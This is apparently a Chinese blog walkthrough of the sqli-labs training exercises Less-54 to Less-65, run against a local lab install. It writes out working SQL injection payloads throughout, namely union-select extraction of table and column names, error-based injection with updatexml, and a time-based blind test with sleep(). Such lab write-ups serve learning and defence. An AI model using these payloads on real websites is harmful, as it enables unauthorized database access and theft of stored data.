• sqli-labs Less54-Less65

    Less54

    从第54关开始,就比较偏向实际挑战方向,这一关对输入次数进行了限制,要求在十次之内,否则刷新数据库随机更新表名列名等信息

    首先判断包裹形式,这一关为单引号包裹

    http://127.0.0.1/sqli-labs-master/Less-54/?id=1'--+

     判断列数http://127.0.0.1/sqli-labs-master/Less-54/?id=1' order by 3--+

     查看当前数据库 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,database() --+  当前数据库为challenges

     查表 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='challenges'--+

    表名为f7fs4xzk70

     查字段 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='f7fs4xzk70'--+   

     查信息 http://127.0.0.1/sqli-labs-master/Less-54/?id=-1' union select 1,2,group_concat(concat_ws(0x7e,secret_DPET))from challenges.f7fs4xzk70 --+

    取出信息放入下面

     我们成功过关

     Less-55

    这一关有14次机会,包裹形式为?id=1)  其他步骤均与Less54相同

    Less-56

    这一关包裹形式为?id=1') 其他步骤均与Less54相同

    Less-57

    这一关有14次机会,包裹形式为?id=1" 其他步骤均与Less54相同

    Less-58

    这一关只有五次机会,显然不能使用联合查询,这一关我们使用报错注入

    有题目(刚打开的页面显示)可知,我们当前数据库为challenges

    查表 http://127.0.0.1/sqli-labs-master/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='challenges')),1)--+   表名为v000pri418

     查字段  http://127.0.0.1/sqli-labs-master/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='v000pri418')),1)--+   

     查信息 http://127.0.0.1/sqli-labs-master/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(0x7e,secret_T5XO)from challenges.v000pri418)),1)--+

     通关成功

     Less-59

    这一关没有包裹,其他均与第58关相同

    Less-60

    这一关的包裹形式为?id=1")  其他均与第58关相同,包裹形式不好测出,多试几次即可

    Less-61

    这一关的包裹形式为?id=1')  其他均与第58关相同,包裹形式不好测出,多试几次即可

    Less-62

    这一关给了130次机会,由此判断这一关主要使用盲注

    判断包裹形式  http://127.0.0.1/sqli-labs-master/Less-62/?id=1') --+  此次为单引号加括号

     由题目可知数据库名字为challenges

    测试数据库的长度

    http://127.0.0.1/sqli-labs-master/Less-62/?id=1') if((length(database())=1),1,sleep(5)--+  立刻回显

     剩下的可以查看第8-10关的内容,我们也可以使用burpsuit,参考前面的第5关。

    Less-63

    包裹形式为?id=1' 在要求与方法上,本关与Less-62相同。

    Less-64

    包裹形式为?id=1))  在要求与方法上,本关与Less-62相同。

    Less-65

    包裹形式为?id=1")在要求与方法上,本关与Less-62相同。
  • 相关阅读:
    洛谷P2580(trie)
    bzoj4373:算数天才与等差数列
    校门外的树(3)
    Ubuntu系统配置的一些要点
    字符串hash
    洛谷P3387 缩点模板
    3dmax多个版本软件的安装包以及安装教程
    【3dsmax2016】安装图文教程、破解注册以及切换语言方法
    photoshop常用快捷键大全
    unity3d脚本语言中的引用类型
  • 原文地址:https://www.cnblogs.com/heiwa-0924/p/12397697.html
Copyright © 2020-2023  润新知